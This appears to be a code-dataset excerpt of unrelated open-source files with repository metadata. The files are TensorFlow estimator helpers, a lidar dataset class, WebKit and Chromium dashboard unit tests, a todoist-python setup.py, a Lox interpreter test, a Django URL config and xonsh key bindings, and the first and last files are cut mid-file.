if ops.GraphKeys.GLOBAL_STEP not in metrics:
raise ValueError(
'Internal error: `Estimator.evaluate` result should have '
'`global_step` in result. Given {}'.format(metrics))
# Validates checkpoint_path.
if not checkpoint_path:
raise ValueError(
'Internal error: `checkpoint_path` should never be empty.')
return super(_EvalResult, cls).__new__(cls, status, metrics,
checkpoint_path)
class _ContinuousEvalListener(object):
"""Interface for listeners that take action before or after evaluation."""
def before_eval(self):
"""Called before evaluation.
Returns:
`False` if you want to skip the current evaluation and early stop the
continuous evaluation; `True` otherwise.
"""
return True
def after_eval(self, eval_result):
"""Called after the evaluation is executed.
Args:
eval_result: An `_EvalResult` instance.
Returns:
False if you want to early stop continuous evaluation; `True` otherwise.
"""
del eval_result
return True
def _assert_eval_spec(eval_spec):
"""Raise error if `eval_spec` is not of the right type."""
if not isinstance(eval_spec, EvalSpec):
raise TypeError('`eval_spec` must have type `tf.estimator.EvalSpec`. '
'Got: {}'.format(type(eval_spec)))
| 39.179702
| 144
| 0.686447
|
b4059bf717f5a5b7b5a23c6e3b2f5b6cfe641fdd
| 2,968
|
py
|
Python
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 6
|
2021-05-10T09:42:01.000Z
|
2022-01-04T08:03:42.000Z
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 3
|
2021-08-16T02:19:10.000Z
|
2022-01-10T02:05:48.000Z
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 1
|
2021-07-15T00:51:58.000Z
|
2021-07-15T00:51:58.000Z
|
import numpy as np
from pathlib import Path
from collections import defaultdict
from torch.utils.data import Dataset
from .registry import DATASETS
from .augmentor import DataAugmentor
from .processor import DataProcessor
@DATASETS.register
class PointCloudDataset(Dataset):
def __init__(self, cfg, logger=None):
self.cfg = cfg
self.logger = logger
self.class_names = cfg.class_names
self.root_path = Path(cfg.root_path)
if self.cfg.get('augmentor', None):
self.data_augmentor = DataAugmentor(self.root_path, cfg.augmentor, self.class_names, logger)
if self.cfg.get('pre_processor', None):
self.pre_processor = DataProcessor(cfg.pre_processor)
def __len__(self):
raise NotImplementedError
def forward(self, index):
raise NotImplementedError
def augment_data(self, data_dict):
if data_dict.get('gt_names', None) is not None:
gt_boxes_mask = np.array([n in self.class_names for n in data_dict['gt_names']], dtype=np.bool_)
data_dict = self.data_augmentor.forward(
data_dict={
**data_dict,
'gt_boxes_mask': gt_boxes_mask
}
)
else:
data_dict = self.data_augmentor.forward(
data_dict={**data_dict})
if data_dict.get('gt_boxes', None) is not None:
if len(data_dict['gt_boxes']) == 0:
new_index = np.random.randint(self.__len__())
return self.__getitem__(new_index)
return data_dict
def pre_process(self, data_dict):
data_dict = self.pre_processor.forward(data_dict)
return data_dict
@staticmethod
def collate_batch(batch_list, _unused=False):
data_dict = defaultdict(list)
for cur_sample in batch_list:
for key, val in cur_sample.items():
data_dict[key].append(val)
batch_size = len(batch_list)
ret = {}
for key, val in data_dict.items():
if key in ['voxels', 'voxel_num_points']:
ret[key] = np.concatenate(val, axis=0)
elif key in ['points', 'voxel_coords']:
coors = []
for i, coor in enumerate(val):
coor_pad = np.pad(coor, ((0, 0), (1, 0)), mode='constant', constant_values=i)
coors.append(coor_pad)
ret[key] = np.concatenate(coors, axis=0)
elif key in ['gt_boxes']:
max_gt = max([len(x) for x in val])
batch_gt_boxes3d = np.zeros((batch_size, max_gt, val[0].shape[-1]), dtype=np.float32)
for k in range(batch_size):
batch_gt_boxes3d[k, :val[k].__len__(), :] = val[k]
ret[key] = batch_gt_boxes3d
else:
ret[key] = np.stack(val, axis=0)
ret['batch_size'] = batch_size
return ret
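# Minimal sketch (hypothetical arrays) of what collate_batch produces: 'points' gain a
# leading batch-index column and are concatenated, while 'gt_boxes' are zero-padded to
# the largest per-sample count.
if __name__ == '__main__':
    sample_a = {'points': np.zeros((4, 3), dtype=np.float32),
                'gt_boxes': np.ones((2, 7), dtype=np.float32)}
    sample_b = {'points': np.zeros((2, 3), dtype=np.float32),
                'gt_boxes': np.ones((1, 7), dtype=np.float32)}
    batch = PointCloudDataset.collate_batch([sample_a, sample_b])
    print(batch['points'].shape)    # (6, 4): batch index prepended, then concatenated
    print(batch['gt_boxes'].shape)  # (2, 2, 7): zero-padded to the max box count
    print(batch['batch_size'])      # 2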
| 35.333333
| 108
| 0.584232
|
c4cf69bcf3f38f0cafb6db86de951fd40b2deddf
| 2,733
|
py
|
Python
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 6
|
2021-07-05T16:09:39.000Z
|
2022-03-06T22:44:42.000Z
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 7
|
2022-03-15T13:25:39.000Z
|
2022-03-15T13:25:44.000Z
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.config.ports import MacPort, MacWK2Port
from webkitpy.tool.mocktool import MockOptions, MockTool
from webkitpy.tool.steps.update import Update
class UpdateTest(unittest.TestCase):
def test_update_command_non_interactive(self):
tool = MockTool()
options = MockOptions(non_interactive=True)
step = Update(tool, options)
self.assertEqual(["mock-update-webkit"], step._update_command())
tool._deprecated_port = MacPort()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
tool._deprecated_port = MacWK2Port()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
def test_update_command_interactive(self):
tool = MockTool()
options = MockOptions(non_interactive=False)
step = Update(tool, options)
self.assertEqual(["mock-update-webkit"], step._update_command())
tool._deprecated_port = MacPort()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
tool._deprecated_port = MacWK2Port()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
| 44.803279
| 81
| 0.749726
|
d74b324b256310dd42659b194a31eefeac0fc9de
| 1,177
|
py
|
Python
|
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# The os module provides functions for interacting with the operating system; it is part of Python's standard utility modules.
import os
# Setuptools is a package-development library that facilitates packaging Python projects by enhancing the standard library's distutils.
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except Exception:
return ""
# Package metadata and installation configuration passed to setuptools
setup(
name="todoist-python",
version="8.1.2",
packages=["todoist", "todoist.managers"],
author="Doist Team",
author_email="info@todoist.com",
license="BSD",
description="todoist-python - The official Todoist Python API library",
long_description=read("README.md"),
install_requires=[
"requests",
"typing;python_version<'3.5'",
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
),
)
| 31.810811
| 153
| 0.683093
|
0453689c0f49be882bf8832f16ed3d96188fc9df
| 666
|
py
|
Python
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | 2
|
2021-12-18T01:52:50.000Z
|
2022-01-17T19:41:52.000Z
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | 18
|
2021-11-30T04:05:53.000Z
|
2022-02-01T03:30:04.000Z
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | null | null | null |
from textwrap import dedent
import pytest
from pylox.lox import Lox
# Base cases from https://github.com/munificent/craftinginterpreters/blob/master/test/method/print_bound_method.lox
TEST_SRC = dedent(
"""\
class Foo {
method() { }
}
var foo = Foo();
print foo.method; // expect: <fn method>
"""
)
EXPECTED_STDOUTS = ["<fn method>"]
def test_print_bound_method(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
| 22.2
| 115
| 0.701201
|
d05644267a753a63685ad8b0fd6897473430c213
| 750
|
py
|
Python
|
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
"""untitled URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 34.090909
| 77
| 0.709333
|
7d7956a4a4a648d8a2212f423b26901429d7c12a
| 16,345
|
py
|
Python
|
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | 6
|
2020-07-19T21:51:44.000Z
|
2022-02-13T08:22:58.000Z
|
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | 1
|
2020-07-24T18:22:03.000Z
|
2020-07-24T18:22:03.000Z
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import speed_releasing
from dashboard.common import datastore_hooks
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
from dashboard.models import table_config
_SAMPLE_BOTS = ['ChromiumPerf/win', 'ChromiumPerf/linux']
_DOWNSTREAM_BOTS = ['ClankInternal/win', 'ClankInternal/linux']
_SAMPLE_TESTS = ['my_test_suite/my_test', 'my_test_suite/my_other_test']
_SAMPLE_LAYOUT = ('{ "my_test_suite/my_test": ["Foreground", '
'"Pretty Name 1"],"my_test_suite/my_other_test": '
' ["Foreground", "Pretty Name 2"]}')
RECENT_REV = speed_releasing.CHROMIUM_MILESTONES[
speed_releasing.CURRENT_MILESTONE][0] + 42
class SpeedReleasingTest(testing_common.TestCase):
def setUp(self):
super(SpeedReleasingTest, self).setUp()
app = webapp2.WSGIApplication([(
r'/speed_releasing/(.*)',
speed_releasing.SpeedReleasingHandler)])
self.testapp = webtest.TestApp(app)
testing_common.SetSheriffDomains(['chromium.org'])
testing_common.SetIsInternalUser('internal@chromium.org', True)
self.SetCurrentUser('internal@chromium.org', is_admin=True)
def tearDown(self):
super(SpeedReleasingTest, self).tearDown()
self.UnsetCurrentUser()
def _AddInternalBotsToDataStore(self):
"""Adds sample bot/master pairs."""
master_key = ndb.Key('Master', 'ChromiumPerf')
graph_data.Bot(
id='win', parent=master_key, internal_only=True).put()
graph_data.Bot(
id='linux', parent=master_key, internal_only=True).put()
def _AddPublicBotsToDataStore(self):
"""Adds sample bot/master pairs."""
master_key = ndb.Key('Master', 'ChromiumPerf')
graph_data.Bot(
id='win', parent=master_key, internal_only=False).put()
graph_data.Bot(
id='linux', parent=master_key, internal_only=False).put()
def _AddTableConfigDataStore(self, name, is_internal, is_downstream=False):
"""Add sample internal only tableConfig."""
keys = self._AddTests(is_downstream)
if is_internal:
self._AddInternalBotsToDataStore()
else:
self._AddPublicBotsToDataStore()
table_config.CreateTableConfig(
name=name, bots=_SAMPLE_BOTS if not is_downstream else _DOWNSTREAM_BOTS,
tests=_SAMPLE_TESTS,
layout=_SAMPLE_LAYOUT,
username='internal@chromium.org',
override=0)
return keys
def _AddTests(self, is_downstream):
master = 'ClankInternal' if is_downstream else 'ChromiumPerf'
testing_common.AddTests([master], ['win', 'linux'], {
'my_test_suite': {
'my_test': {},
'my_other_test': {},
},
})
keys = [
utils.TestKey(master + '/win/my_test_suite/my_test'),
utils.TestKey(master + '/win/my_test_suite/my_other_test'),
utils.TestKey(master + '/linux/my_test_suite/my_test'),
utils.TestKey(master + '/linux/my_test_suite/my_other_test'),
]
for test_key in keys:
test = test_key.get()
test.units = 'timeDurationInMs'
test.put()
return keys
def _AddAlertsWithDifferentMasterAndBenchmark(self):
"""Adds 10 alerts with different benchmark/master."""
master = 'FakeMaster'
testing_common.AddTests([master], ['win'], {
'my_fake_suite': {
'my_fake_test': {},
},
})
keys = [
utils.TestKey(master + '/win/my_fake_suite/my_fake_test'),
]
self._AddRows(keys)
self._AddAlertsToDataStore(keys)
def _AddAlertsToDataStore(self, test_keys):
"""Adds sample data, including triaged and non-triaged alerts."""
key_map = {}
for test_key in test_keys:
test = test_key.get()
test.improvement_direction = anomaly.DOWN
test.put()
# Add some (10 * len(keys)) non-triaged alerts.
for end_rev in range(420500, 421500, 100):
for test_key in test_keys:
ref_test_key = utils.TestKey('%s_ref' % utils.TestPath(test_key))
anomaly_entity = anomaly.Anomaly(
start_revision=end_rev - 5, end_revision=end_rev, test=test_key,
median_before_anomaly=100, median_after_anomaly=200,
ref_test=ref_test_key)
anomaly_entity.SetIsImprovement()
anomaly_key = anomaly_entity.put()
key_map[end_rev] = anomaly_key
return key_map
def _AddRows(self, keys):
for key in keys:
testing_common.AddRows(utils.TestPath(key), [1, 2, 3, RECENT_REV])
def _AddDownstreamRows(self, keys):
revisions = [1, 2, 1485025126, 1485099999]
for key in keys:
testing_common.AddRows(
utils.TestPath(key), revisions)
for key in keys:
for rev in revisions:
row_key = utils.GetRowKey(key, rev)
row = row_key.get()
row.r_commit_pos = str(rev // 10000)
row.a_default_rev = 'r_foo'
row.r_foo = 'abcdefghijk'
row.put()
def testGet_ShowPage(self):
response = self.testapp.get('/speed_releasing/')
self.assertIn('speed-releasing-page', response)
def testPost_InternalListPage(self):
self._AddTableConfigDataStore('BestTable', True)
self._AddTableConfigDataStore('SecondBestTable', True)
self._AddTableConfigDataStore('ThirdBestTable', False)
response = self.testapp.post('/speed_releasing/')
self.assertIn('"show_list": true', response)
self.assertIn('"list": ["BestTable", "SecondBestTable", '
'"ThirdBestTable"]', response)
def testPost_ShowInternalTable(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=1&revB=2')
self.assertIn('"name": "BestTable"', response)
self.assertIn('"table_bots": ["ChromiumPerf/win", '
'"ChromiumPerf/linux"]', response)
self.assertIn('"table_tests": ["my_test_suite/my_test",'
' "my_test_suite/my_other_test"]', response)
self.assertIn('"table_layout"', response)
self.assertIn('"revisions": [2, 1]', response)
self.assertIn('"display_revisions": [2, 1]', response)
self.assertIn('"units": {"my_test_suite/my_test": "timeDurationInMs", '
'"my_test_suite/my_other_test": "timeDurationInMs"',
response)
self.assertIn('"categories": {"Foreground": 2}', response)
self.assertIn('"values": {"1": {"ChromiumPerf/linux": '
'{"my_test_suite/my_test": 1.0, '
'"my_test_suite/my_other_test": 1.0}, '
'"ChromiumPerf/win": {"my_test_suite/my_test": 1.0, '
'"my_test_suite/my_other_test": 1.0}}, '
'"2": {"ChromiumPerf/linux": {"my_test_suite/my_test": '
'2.0, "my_test_suite/my_other_test": 2.0}, '
'"ChromiumPerf/win": {"my_test_suite/my_test": 2.0, '
'"my_test_suite/my_other_test": 2.0}}}', response)
self.assertIn('"urls": {"ChromiumPerf/linux/my_test_suite/my_other_test": '
'"?masters=ChromiumPerf&start_rev=1&checked=my_other_test&'
'tests=my_test_suite%2Fmy_other_test&end_rev=2&bots=linux", '
'"ChromiumPerf/win/my_test_suite/my_other_test": '
'"?masters=ChromiumPerf&start_rev=1&checked=my_other_test&'
'tests=my_test_suite%2Fmy_other_test&end_rev=2&bots=win", '
'"ChromiumPerf/linux/my_test_suite/my_test": "?masters'
'=ChromiumPerf&start_rev=1&checked=my_test&tests='
'my_test_suite%2Fmy_test&end_rev=2&bots=linux", '
'"ChromiumPerf/win/my_test_suite/my_test": "?masters='
'ChromiumPerf&start_rev=1&checked=my_test&tests=my_test_suite'
'%2Fmy_test&end_rev=2&bots=win"}',
response)
def testPost_InternalListPageToExternalUser(self):
self._AddTableConfigDataStore('BestTable', True)
self._AddTableConfigDataStore('SecondBestTable', True)
self._AddTableConfigDataStore('ThirdBestTable', False)
self.UnsetCurrentUser()
datastore_hooks.InstallHooks()
response = self.testapp.post('/speed_releasing/')
self.assertIn('"show_list": true', response)
self.assertIn('"list": ["ThirdBestTable"]', response)
def testPost_ShowInternalTableToExternalUser(self):
self._AddTableConfigDataStore('BestTable', True)
self.UnsetCurrentUser()
self.testapp.post('/speed_releasing/BestTable?revA=1&revB=2', {
}, status=500) # 500 means user can't see data.
def testPost_TableWithTableNameThatDoesntExist(self):
response = self.testapp.post('/speed_releasing/BestTable')
self.assertIn('Invalid table name.', response)
def testPost_TableWithNoRevParamsOnlyDownStream(self):
keys = self._AddTableConfigDataStore('BestTable', True, True)
self._AddDownstreamRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=1485099999&'
'revB=1485025126')
self.assertIn('"revisions": [1485099999, 1485025126]', response)
self.assertIn('"display_revisions": ["148509-abc", "148502-abc"]', response)
def testPost_TableWithMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=56')
self.assertIn('"revisions": [445288, 433400]', response)
self.assertIn('"display_milestones": [56, 56]', response)
self.assertIn('"navigation_milestones": [55, 57]', response)
def testPost_TableWithNewestMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
current_milestone = speed_releasing.CURRENT_MILESTONE
response = self.testapp.post('/speed_releasing/BestTable?m=%s' %
current_milestone)
current_milestone_start_rev = speed_releasing.CHROMIUM_MILESTONES[
current_milestone][0]
self.assertIn(
'"revisions": [%s, %s]' % (
RECENT_REV, current_milestone_start_rev), response)
self.assertIn(
'"display_milestones": [%s, %s]' % (
current_milestone, current_milestone), response)
self.assertIn(
'"navigation_milestones": [%s, null]' % (
current_milestone - 1), response)
def testPost_TableWithHighMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=71')
self.assertIn('"error": "No data for that milestone."', response)
def testPost_TableWithLowMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=7')
self.assertIn('"error": "No data for that milestone."', response)
def testPost_TableWithNoRevParams(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable')
current_milestone_start_rev = speed_releasing.CHROMIUM_MILESTONES[
speed_releasing.CURRENT_MILESTONE][0]
self.assertIn(
'"revisions": [%s, %s]' % (
RECENT_REV, current_milestone_start_rev), response)
def testPost_TableWithRevParamEndRevAlsoStartRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=433400')
self.assertIn('"revisions": [445288, 433400]', response)
def testPost_TableWithOneRevParamUniqueEndRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=423768')
self.assertIn('"revisions": [423768, 416640]', response)
self.assertIn('"display_milestones": [54, 54]', response)
self.assertIn('"navigation_milestones": [null, 55]', response)
def testPost_TableWithOneRevParamBetweenMilestones(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=455000')
self.assertIn('"revisions": [463842, 455000]', response)
self.assertIn('"display_milestones": [58, 58]', response)
def testPost_TableWithRevParamMiddleRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=444000')
self.assertIn('"revisions": [445288, 444000]', response)
self.assertIn('"display_milestones": [56, 56]', response)
def testPost_TableWithRevParamHighRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=50000000')
self.assertIn('"revisions": [50000000, %s]' % RECENT_REV, response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevParamLowRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=1')
self.assertIn('"revisions": [%s, 1]' % RECENT_REV, response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevsParamTwoMilestones(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revA=417000&revB=440000')
self.assertIn('"revisions": [440000, 417000]', response)
self.assertIn('"display_milestones": [54, 56]', response)
self.assertIn('"navigation_milestones": [null, 56]', response)
def testPost_TableWithRevsParamHigh(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revA=50000000&revB=60000000')
self.assertIn('"revisions": [60000000, 50000000]', response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevsParamSelfContained(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revB=420000&revA=421000')
self.assertIn('"revisions": [421000, 420000]', response)
self.assertIn('"display_milestones": [54, 54]', response)
def testPost_ReleaseNotes(self):
keys = self._AddTableConfigDataStore('BestTable', True, False)
self._AddRows(keys)
self._AddAlertsToDataStore(keys)
self._AddAlertsWithDifferentMasterAndBenchmark()
response = self.testapp.post('/speed_releasing/BestTable?'
'revB=420000&revA=421000&anomalies=true')
self.assertIn('"revisions": [421000, 420000]', response)
# Make sure we aren't getting a table here instead of Release Notes.
self.assertNotIn('"display_revisions"', response)
# There are 50 anomalies total (5 tests on 10 revisions). 1 test does not
# have the correct master/benchmark, so 4 valid tests. Further, the
# revisions are [420500:421500:100] meaning that there are 6 revisions in
# the url param's range. 6*4 = 24 anomalies that should be returned.
anomaly_list = self.GetJsonValue(response, 'anomalies')
self.assertEqual(len(anomaly.Anomaly.query().fetch()), 50)
self.assertEqual(len(anomaly_list), 24)
for alert in anomaly_list:
self.assertEqual(alert['master'], 'ChromiumPerf')
self.assertIn(alert['test'], ['my_test', 'my_other_test'])
self.assertGreaterEqual(alert['end_revision'], 420000)
self.assertLessEqual(alert['end_revision'], 421000)
| 43.355438
| 80
| 0.683451
|
0f40446a71d7f7175cd34aa9ab457e35c182fb6d
| 14,735
|
py
|
Python
|
xonsh/ptk_shell/key_bindings.py
|
meramsey/xonsh
|
5685ffc8b8aa921012b31dc8af02e14388b730e9
|
[
"BSD-2-Clause-FreeBSD"
] | 4,716
|
2016-06-07T05:48:42.000Z
|
2022-03-31T22:30:15.000Z
|
xonsh/ptk_shell/key_bindings.py
|
meramsey/xonsh
|
5685ffc8b8aa921012b31dc8af02e14388b730e9
|
[
"BSD-2-Clause-FreeBSD"
] | 3,644
|
2016-06-07T05:55:42.000Z
|
2022-03-31T13:25:57.000Z
|
xonsh/ptk_shell/key_bindings.py
|
agoose77/xonsh
|
7331d8aee50e8939f8fe4d5b7133ed3907f204f4
|
[
"BSD-2-Clause-FreeBSD"
] | 576
|
2016-06-07T06:28:32.000Z
|
2022-03-31T02:46:15.000Z
|
# -*- coding: utf-8 -*-
"""Key bindings for prompt_toolkit xonsh shell."""
from prompt_toolkit import search
from prompt_toolkit.application.current import get_app
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (
Condition,
IsMultiline,
HasSelection,
EmacsInsertMode,
ViInsertMode,
IsSearching,
)
from prompt_toolkit.keys import Keys
from prompt_toolkit.input import ansi_escape_sequences
from prompt_toolkit.key_binding.key_bindings import KeyBindings, KeyBindingsBase
from prompt_toolkit.key_binding.bindings.named_commands import get_by_name
from xonsh.aliases import xonsh_exit
from xonsh.tools import (
check_for_partial_string,
get_line_continuation,
ends_with_colon_token,
)
from xonsh.built_ins import XSH
from xonsh.platform import ON_WINDOWS
from xonsh.shell import transform_command
DEDENT_TOKENS = frozenset(["raise", "return", "pass", "break", "continue"])
def carriage_return(b, cli, *, autoindent=True):
"""Preliminary parser to determine if 'Enter' key should send command to the
xonsh parser for execution or should insert a newline for continued input.
Current 'triggers' for inserting a newline are:
- Not on first line of buffer and line is non-empty
- Previous character is a colon (covers if, for, etc...)
- User is in an open paren-block
- Line ends with backslash
- Any text exists below cursor position (relevant when editing previous
multiline blocks)
"""
doc = b.document
at_end_of_line = _is_blank(doc.current_line_after_cursor)
current_line_blank = _is_blank(doc.current_line)
env = XSH.env
indent = env.get("INDENT") if autoindent else ""
partial_string_info = check_for_partial_string(doc.text)
in_partial_string = (
partial_string_info[0] is not None and partial_string_info[1] is None
)
# indent after a colon
if ends_with_colon_token(doc.current_line_before_cursor) and at_end_of_line:
b.newline(copy_margin=autoindent)
b.insert_text(indent, fire_event=False)
# if current line isn't blank, check dedent tokens
elif (
not current_line_blank
and doc.current_line.split(maxsplit=1)[0] in DEDENT_TOKENS
and doc.line_count > 1
):
b.newline(copy_margin=autoindent)
b.delete_before_cursor(count=len(indent))
elif not doc.on_first_line and not current_line_blank:
b.newline(copy_margin=autoindent)
elif doc.current_line.endswith(get_line_continuation()):
b.newline(copy_margin=autoindent)
elif doc.find_next_word_beginning() is not None and (
any(not _is_blank(i) for i in doc.lines_from_current[1:])
):
b.newline(copy_margin=autoindent)
elif not current_line_blank and not can_compile(doc.text):
b.newline(copy_margin=autoindent)
elif current_line_blank and in_partial_string:
b.newline(copy_margin=autoindent)
else:
b.validate_and_handle()
def _is_blank(line):
return len(line.strip()) == 0
def can_compile(src):
"""Returns whether the code can be compiled, i.e. it is valid xonsh."""
src = src if src.endswith("\n") else src + "\n"
src = transform_command(src, show_diff=False)
src = src.lstrip()
try:
XSH.execer.compile(src, mode="single", glbs=None, locs=XSH.ctx)
rtn = True
except SyntaxError:
rtn = False
except Exception:
rtn = True
return rtn
@Condition
def tab_insert_indent():
"""Check if <Tab> should insert indent instead of starting autocompletion.
Checks if there are only whitespaces before the cursor - if so indent
should be inserted, otherwise autocompletion.
"""
before_cursor = get_app().current_buffer.document.current_line_before_cursor
return bool(before_cursor.isspace())
@Condition
def tab_menu_complete():
"""Checks whether completion mode is `menu-complete`"""
return XSH.env.get("COMPLETION_MODE") == "menu-complete"
@Condition
def beginning_of_line():
